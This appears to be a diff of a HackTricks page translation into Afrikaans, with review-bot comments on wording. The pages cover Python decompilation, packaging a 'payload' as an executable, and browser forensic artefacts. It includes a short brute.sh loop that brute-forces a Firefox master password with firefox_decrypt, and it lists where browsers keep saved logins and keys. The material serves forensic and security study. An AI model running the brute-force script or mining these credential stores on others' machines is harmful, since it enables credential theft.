1 0 LOAD_CONST 0 (<code object hello_world at 0x7f31b7240eb0, file "hello.py", line 1>)
|
||||
3 MAKE_FUNCTION 0
|
||||
6 STORE_NAME 0 (hello_world)
|
||||
9 LOAD_CONST 1 (None)
|
||||
12 RETURN_VALUE
|
||||
1 0 LOAD_CONST 0 (<code object hello_world at 0x7f31b7240eb0, file "hello.py", line 1>)
|
||||
3 MAKE_FUNCTION 0
|
||||
6 STORE_NAME 0 (hello_world)
|
||||
9 LOAD_CONST 1 (None)
|
||||
12 RETURN_VALUE
|
||||
>>>
|
||||
>>> # Also disassemble that const being loaded (our function)
|
||||
>>> dis.disassemble(code.co_consts[0])
|
||||
2 0 LOAD_CONST 1 ('Hello {0}')
|
||||
3 LOAD_ATTR 0 (format)
|
||||
6 LOAD_FAST 0 (name)
|
||||
9 CALL_FUNCTION 1
|
||||
12 PRINT_ITEM
|
||||
13 PRINT_NEWLINE
|
||||
14 LOAD_CONST 0 (None)
|
||||
17 RETURN_VALUE
|
||||
2 0 LOAD_CONST 1 ('Hello {0}')
|
||||
3 LOAD_ATTR 0 (format)
|
||||
6 LOAD_FAST 0 (name)
|
||||
9 CALL_FUNCTION 1
|
||||
12 PRINT_ITEM
|
||||
13 PRINT_NEWLINE
|
||||
14 LOAD_CONST 0 (None)
|
||||
17 RETURN_VALUE
|
||||
```
|
||||
## Python na Uitvoerbare lêer
|
||||
|
||||
## Python to Executable
|
||||
Om te begin, gaan ons jou wys hoe ladingstukke gekompileer kan word in py2exe en PyInstaller.
|
||||
|
||||
To start, we’re going to show you how payloads can be compiled in py2exe and PyInstaller.
|
||||
|
||||
### To create a payload using py2exe:
|
||||
|
||||
1. Install the py2exe package from [http://www.py2exe.org/](http://www.py2exe.org)
|
||||
2. For the payload (in this case, we will name it hello.py), use a script like the one in Figure 1. The option “bundle\_files” with the value of 1 will bundle everything including the Python interpreter into one exe.
|
||||
3. Once the script is ready, we will issue the command “python setup.py py2exe”. This will create the executable, just like in Figure 2.
|
||||
### Om 'n ladingstuk te skep met behulp van py2exe:
|
||||
|
||||
1. Installeer die py2exe-pakket vanaf [http://www.py2exe.org/](http://www.py2exe.org)
|
||||
2. Vir die ladingstuk (in hierdie geval noem ons dit hello.py), gebruik 'n skripsie soos die een in Figuur 1. Die opsie "bundle\_files" met die waarde van 1 sal alles insluitend die Python-tolk in een uitvoerbare lêer saamvoeg.
|
||||
3. Sodra die skripsie gereed is, sal ons die opdrag "python setup.py py2exe" uitreik. Dit sal die uitvoerbare lêer skep, net soos in Figuur 2.
|
||||
```python
|
||||
from distutils.core import setup
|
||||
import py2exe, sys, os
|
||||
|
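Review bot: "skripsie" in "gebruik 'n skripsie soos die een in Figuur 1" and "Sodra die skripsie gereed is" means a thesis; the script here is a "skrip". "payload" is translated as "ladingstuk" in this py2exe section but left as "payload" in the PyInstaller section of the same file ("Om 'n payload te skep met behulp van PyInstaller"), so choose one term for the whole page. The escaped "bundle\_files" is carried over unchanged, which is correct for GitBook rendering.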
@ -192,10 +175,10 @@ import py2exe, sys, os
|
|||
sys.argv.append('py2exe')
|
||||
|
||||
setup(
|
||||
options = {'py2exe': {'bundle_files': 1}},
|
||||
#windows = [{'script': "hello.py"}],
|
||||
console = [{'script': "hello.py"}],
|
||||
zipfile = None,
|
||||
options = {'py2exe': {'bundle_files': 1}},
|
||||
#windows = [{'script': "hello.py"}],
|
||||
console = [{'script': "hello.py"}],
|
||||
zipfile = None,
|
||||
)
|
||||
```
|
||||
|
||||
|
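Review bot: the removed and added lines of the setup() body ("options = {'py2exe': {'bundle_files': 1}},", "#windows = [{'script': \"hello.py\"}],", "console = ..." and "zipfile = None,") are textually identical in this view, so this is a whitespace-only change to a Python code block inside a translation commit. Confirm that the new indentation inside setup( ) is consistent with the unchanged "sys.argv.append('py2exe')" and ")" lines, and mention in the commit message that code-block formatting was touched, since a reader of a translation commit does not expect code to change.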
@ -212,12 +195,10 @@ running py2exe
|
|||
copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe
|
||||
Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe
|
||||
```
|
||||
### Om 'n payload te skep met behulp van PyInstaller:
|
||||
|
||||
### To create a payload using PyInstaller:
|
||||
|
||||
1. Install PyInstaller using pip (pip install pyinstaller).
|
||||
2. After that, we will issue the command “pyinstaller –onefile hello.py” (a reminder that ‘hello.py’ is our payload). This will bundle everything into one executable.
|
||||
|
||||
1. Installeer PyInstaller met behulp van pip (pip install pyinstaller).
|
||||
2. Daarna sal ons die opdrag "pyinstaller --onefile hello.py" uitreik (let wel dat 'hello.py' ons payload is). Dit sal alles saamvoeg in een uitvoerbare lêer.
|
||||
```
|
||||
C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
|
||||
108 INFO: PyInstaller: 3.3.1
|
||||
|
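Review bot: the translated step 2 corrects the typographic en dash in "pyinstaller –onefile hello.py" to the real flag "pyinstaller --onefile hello.py", which matches the unchanged transcript line "C:\Users\test\Desktop\test>pyinstaller --onefile hello.py" below; the English source line keeps the wrong dash and should receive the same fix so copy-paste works. Terminology: this section keeps "payload" while the py2exe section above translates it as "ladingstuk".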
@ -230,27 +211,26 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
|
|||
5982 INFO: Appending archive to EXE C:\Users\test\Desktop\test\dist\hello.exe
|
||||
6325 INFO: Building EXE from out00-EXE.toc completed successfully.
|
||||
```
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
|
||||
* [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
|
||||
|
||||
<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
|
||||
|
||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||
As jy belangstel in 'n **hackerloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_).
|
||||
|
||||
{% embed url="https://www.stmcyber.com/careers" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
|
|
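Review bot: "ons is aan die werf" appears again in the closing STM Cyber banner (same issue as at the top of the file; "ons werf!" is meant). The footer in this hunk writes "NFT's" and "github-repos" where the header block of the same file writes "NFTs" and "GitHub-opslagplekke"; the two blocks should be identical. The reference "https://blog.f-secure.com/how-to-decompile-any-python-binary/" is kept intact under the translated "## Verwysings" heading, as it should be.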
@ -1,21 +1,19 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
Here you can find interesting tricks for specific file-types and/or software:
|
||||
Hier kan jy interessante truuks vir spesifieke lêertipes en/of sagteware vind:
|
||||
|
||||
{% page-ref page=".pyc.md" %}
|
||||
|
||||
|
@ -41,16 +39,14 @@ Here you can find interesting tricks for specific file-types and/or software:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,80 +1,80 @@
|
|||
# Browser Artifacts
|
||||
# Blaaier Artefakte
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werkstrome** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
## Browsers Artifacts <a href="#id-3def" id="id-3def"></a>
|
||||
## Blaaier Artefakte <a href="#id-3def" id="id-3def"></a>
|
||||
|
||||
Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types.
|
||||
Blaaier artefakte sluit verskillende soorte data in wat deur webblaaier gestoor word, soos navigasiegeskiedenis, bladmerke en kasdata. Hierdie artefakte word in spesifieke lêers binne die bedryfstelsel gehou, wat verskil in ligging en naam oor blaaier, maar oor die algemeen soortgelyke datatipes stoor.
|
||||
|
||||
Here's a summary of the most common browser artifacts:
|
||||
Hier is 'n opsomming van die mees algemene blaaier artefakte:
|
||||
|
||||
- **Navigation History**: Tracks user visits to websites, useful for identifying visits to malicious sites.
|
||||
- **Autocomplete Data**: Suggestions based on frequent searches, offering insights when combined with navigation history.
|
||||
- **Bookmarks**: Sites saved by the user for quick access.
|
||||
- **Extensions and Add-ons**: Browser extensions or add-ons installed by the user.
|
||||
- **Cache**: Stores web content (e.g., images, JavaScript files) to improve website loading times, valuable for forensic analysis.
|
||||
- **Logins**: Stored login credentials.
|
||||
- **Favicons**: Icons associated with websites, appearing in tabs and bookmarks, useful for additional information on user visits.
|
||||
- **Browser Sessions**: Data related to open browser sessions.
|
||||
- **Downloads**: Records of files downloaded through the browser.
|
||||
- **Form Data**: Information entered in web forms, saved for future autofill suggestions.
|
||||
- **Thumbnails**: Preview images of websites.
|
||||
- **Custom Dictionary.txt**: Words added by the user to the browser's dictionary.
|
||||
- **Navigasiegeskiedenis**: Hou by watter webwerwe die gebruiker besoek het, nuttig om besoeke aan skadelike webwerwe te identifiseer.
|
||||
- **Outomatiese voltooiingsdata**: Voorstelle gebaseer op gereelde soektogte, bied insigte wanneer dit gekombineer word met navigasiegeskiedenis.
|
||||
- **Bladmerke**: Webwerwe wat deur die gebruiker gestoor is vir vinnige toegang.
|
||||
- **Uitbreidings en Byvoegings**: Blaaieruitbreidings of byvoegings wat deur die gebruiker geïnstalleer is.
|
||||
- **Kas**: Stoor webinhoud (bv. beelde, JavaScript-lêers) om webwerflaaitye te verbeter, waardevol vir forensiese analise.
|
||||
- **Aantekeninge**: Gestoorde aanmeldingslegitimasie.
|
||||
- **Favicons**: Ikone wat met webwerwe geassosieer word en in blaaierblaaie en bladmerke verskyn, nuttig vir addisionele inligting oor gebruikersbesoeke.
|
||||
- **Blaaier-sessies**: Data wat verband hou met oop blaaier-sessies.
|
||||
- **Aflaaiers**: Rekords van lêers wat deur die blaaier afgelaai is.
|
||||
- **Vormdata**: Inligting wat in webvorms ingevoer is en gestoor word vir toekomstige outomatiese voltooiingsvoorstelle.
|
||||
- **Duimnaels**: Voorskou-afbeeldings van webwerwe.
|
||||
- **Custom Dictionary.txt**: Woorde wat deur die gebruiker by die blaaier se woordeboek gevoeg is.
|
||||
|
||||
|
||||
## Firefox
|
||||
|
||||
Firefox organizes user data within profiles, stored in specific locations based on the operating system:
|
||||
Firefox organiseer gebruikersdata binne profiele, wat in spesifieke liggings volgens die bedryfstelsel gestoor word:
|
||||
|
||||
- **Linux**: `~/.mozilla/firefox/`
|
||||
- **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/`
|
||||
- **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\`
|
||||
|
||||
A `profiles.ini` file within these directories lists the user profiles. Each profile's data is stored in a folder named in the `Path` variable within `profiles.ini`, located in the same directory as `profiles.ini` itself. If a profile's folder is missing, it may have been deleted.
|
||||
'n `profiles.ini`-lêer binne hierdie gidslys die gebruikersprofiele. Elke profiel se data word in 'n vouer gestoor wat genoem word in die `Path`-veranderlike binne `profiles.ini`, wat in dieselfde gids as `profiles.ini` self geleë is. As 'n profiel se vouer ontbreek, is dit moontlik uitgevee.
|
||||
|
||||
Within each profile folder, you can find several important files:
|
||||
Binne elke profielvouer kan jy verskeie belangrike lêers vind:
|
||||
|
||||
- **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data.
|
||||
- Use specific SQL queries to extract history and downloads information.
|
||||
- **bookmarkbackups**: Contains backups of bookmarks.
|
||||
- **formhistory.sqlite**: Stores web form data.
|
||||
- **handlers.json**: Manages protocol handlers.
|
||||
- **persdict.dat**: Custom dictionary words.
|
||||
- **addons.json** and **extensions.sqlite**: Information on installed add-ons and extensions.
|
||||
- **cookies.sqlite**: Cookie storage, with [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) available for inspection on Windows.
|
||||
- **cache2/entries** or **startupCache**: Cache data, accessible through tools like [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html).
|
||||
- **favicons.sqlite**: Stores favicons.
|
||||
- **prefs.js**: User settings and preferences.
|
||||
- **downloads.sqlite**: Older downloads database, now integrated into places.sqlite.
|
||||
- **thumbnails**: Website thumbnails.
|
||||
- **logins.json**: Encrypted login information.
|
||||
- **key4.db** or **key3.db**: Stores encryption keys for securing sensitive information.
|
||||
- **places.sqlite**: Stoor geskiedenis, bladmerke en aflaaie. Gereedskap soos [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) op Windows kan toegang verkry tot die geskiedenisdata.
|
||||
- Gebruik spesifieke SQL-navrae om geskiedenis- en aflaaie-inligting te onttrek.
|
||||
- **bookmarkbackups**: Bevat rugsteun van bladmerke.
|
||||
- **formhistory.sqlite**: Stoor webvormdata.
|
||||
- **handlers.json**: Bestuur protokolhanteraars.
|
||||
- **persdict.dat**: Aangepaste woordeboekwoorde.
|
||||
- **addons.json** en **extensions.sqlite**: Inligting oor geïnstalleerde byvoegings en uitbreidings.
|
||||
- **cookies.sqlite**: Koekie-opberging, met [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) beskikbaar vir inspeksie op Windows.
|
||||
- **cache2/entries** of **startupCache**: Kasdata, toeganklik deur gereedskap soos [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html).
|
||||
- **favicons.sqlite**: Stoor favicons.
|
||||
- **prefs.js**: Gebruikersinstellings en voorkeure.
|
||||
- **downloads.sqlite**: Ouer aflaaie-databasis, nou geïntegreer in places.sqlite.
|
||||
- **thumbnails**: Webwerf-duimnaels.
|
||||
- **logins.json**: Versleutelde aanmeldingsinligting.
|
||||
- **key4.db** of **key3.db**: Stoor versleutelingssleutels vir die beveiliging van sensitiewe inligting.
|
||||
|
||||
Additionally, checking the browser’s anti-phishing settings can be done by searching for `browser.safebrowsing` entries in `prefs.js`, indicating whether safe browsing features are enabled or disabled.
|
||||
Daarbenewens kan die blaaier se anti-phishing-instellings nagegaan word deur te soek na `browser.safebrowsing`-inskrywings in `prefs.js`, wat aandui of veilige blaaierfunksies geaktiveer of gedeaktiveer is.
|
||||
|
||||
|
||||
To try to decrypt the master password, you can use [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt)\
|
||||
With the following script and call you can specify a password file to brute force:
|
||||
Om te probeer om die meesterwagwoord te ontsluit, kan jy [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt) gebruik.\
|
||||
Met die volgende skripsie en oproep kan jy 'n wagwoordlêer spesifiseer om kragtig te krag:
|
||||
|
||||
{% code title="brute.sh" %}
|
||||
```bash
|
||||
|
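Review bot: several translated lines in this hunk change the meaning rather than the language. In the Firefox intro, `Met die volgende skripsie en oproep kan jy 'n wagwoordlêer spesifiseer om kragtig te krag` renders "script" as "skripsie" (a thesis) and "brute force" as "kragtig te krag", which is not Afrikaans; suggest `Met die volgende skrip en oproep kan jy 'n wagwoordlêer spesifiseer om te brute-force`. In the artefact list, `**Aantekeninge**` (notes) for "Logins" should be `**Aanmeldings**`, and `**Aflaaiers**` (downloaders) for "Downloads" should be `**Aflaaie**`, the word the places.sqlite item in the same hunk already uses. Also `hierdie gidslys die gebruikersprofiele` fuses the verb into the noun; it should read `hierdie gidse lys die gebruikersprofiele`.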
@ -83,8 +83,8 @@ With the following script and call you can specify a password file to brute forc
|
|||
#./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:"
|
||||
passfile=$1
|
||||
while read pass; do
|
||||
echo "Trying $pass"
|
||||
echo "$pass" | python firefox_decrypt.py
|
||||
echo "Trying $pass"
|
||||
echo "$pass" | python firefox_decrypt.py
|
||||
done < $passfile
|
||||
```
|
||||
{% endcode %}
|
||||
|
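Review bot: this hunk is a whitespace-only change inside the `brute.sh` code block (the leading spaces before `echo "Trying $pass"` and `echo "$pass" | python firefox_decrypt.py` are dropped) with no translated text; the header `@ -83,8 +83,8 @@` confirms nothing else moved. Reindenting code in a translation commit adds review noise and makes the translated file diverge from the English source in a non-content way; suggest dropping this hunk or keeping the loop body indented as in the original.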
@ -93,113 +93,76 @@ done < $passfile
|
|||
|
||||
## Google Chrome
|
||||
|
||||
Google Chrome stores user profiles in specific locations based on the operating system:
|
||||
Google Chrome stoor gebruikersprofielle in spesifieke liggings gebaseer op die bedryfstelsel:
|
||||
|
||||
- **Linux**: `~/.config/google-chrome/`
|
||||
- **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\`
|
||||
- **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/`
|
||||
|
||||
Within these directories, most user data can be found in the **Default/** or **ChromeDefaultData/** folders. The following files hold significant data:
|
||||
Binne hierdie gids, kan die meeste gebruikersdata gevind word in die **Default/** of **ChromeDefaultData/** gids. Die volgende lêers bevat belangrike data:
|
||||
|
||||
- **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads.
|
||||
- **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available.
|
||||
- **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html).
|
||||
- **Bookmarks**: User bookmarks.
|
||||
- **Web Data**: Contains form history.
|
||||
- **Favicons**: Stores website favicons.
|
||||
- **Login Data**: Includes login credentials like usernames and passwords.
|
||||
- **Current Session**/**Current Tabs**: Data about the current browsing session and open tabs.
|
||||
- **Last Session**/**Last Tabs**: Information about the sites active during the last session before Chrome was closed.
|
||||
- **Extensions**: Directories for browser extensions and addons.
|
||||
- **Thumbnails**: Stores website thumbnails.
|
||||
- **Preferences**: A file rich in information, including settings for plugins, extensions, pop-ups, notifications, and more.
|
||||
- **Browser’s built-in anti-phishing**: To check if anti-phishing and malware protection are enabled, run `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Look for `{"enabled: true,"}` in the output.
|
||||
- **Geskiedenis**: Bevat URL's, aflaaiers, en soek sleutelwoorde. Op Windows, kan [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) gebruik word om die geskiedenis te lees. Die "Transition Type" kolom het verskillende betekenisse, insluitend gebruiker klieke op skakels, getikte URL's, vorm indienings, en bladsy herlaaiings.
|
||||
- **Koekies**: Stoor koekies. Vir inspeksie, is [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) beskikbaar.
|
||||
- **Cache**: Hou gekasde data. Om te inspekteer, kan Windows gebruikers [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html) gebruik.
|
||||
- **Bladmerke**: Gebruiker bladmerke.
|
||||
- **Web Data**: Bevat vorm geskiedenis.
|
||||
- **Favicons**: Stoor webwerf favicons.
|
||||
- **Login Data**: Sluit aanmeldingslegitimasie soos gebruikersname en wagwoorde in.
|
||||
- **Huidige Sessie**/**Huidige Vlakke**: Data oor die huidige blaaier sessie en oop vlakke.
|
||||
- **Laaste Sessie**/**Laaste Vlakke**: Inligting oor die webwerwe aktief gedurende die laaste sessie voor Chrome gesluit is.
|
||||
- **Uitbreidings**: Gids vir blaaier uitbreidings en addons.
|
||||
- **Duimnaels**: Stoor webwerf duimnaels.
|
||||
- **Voorkeure**: 'n Lêer ryk aan inligting, insluitend instellings vir plugins, uitbreidings, pop-ups, kennisgewings, en meer.
|
||||
- **Blaaier se ingeboude anti-phishing**: Om te kyk of anti-phishing en malware beskerming geaktiveer is, voer `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences` uit. Kyk vir `{"enabled: true,"}` in die uitset.
|
||||
|
||||
|
||||
## **SQLite DB Data Recovery**
|
||||
## **SQLite DB Data Herwinning**
|
||||
|
||||
As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
|
||||
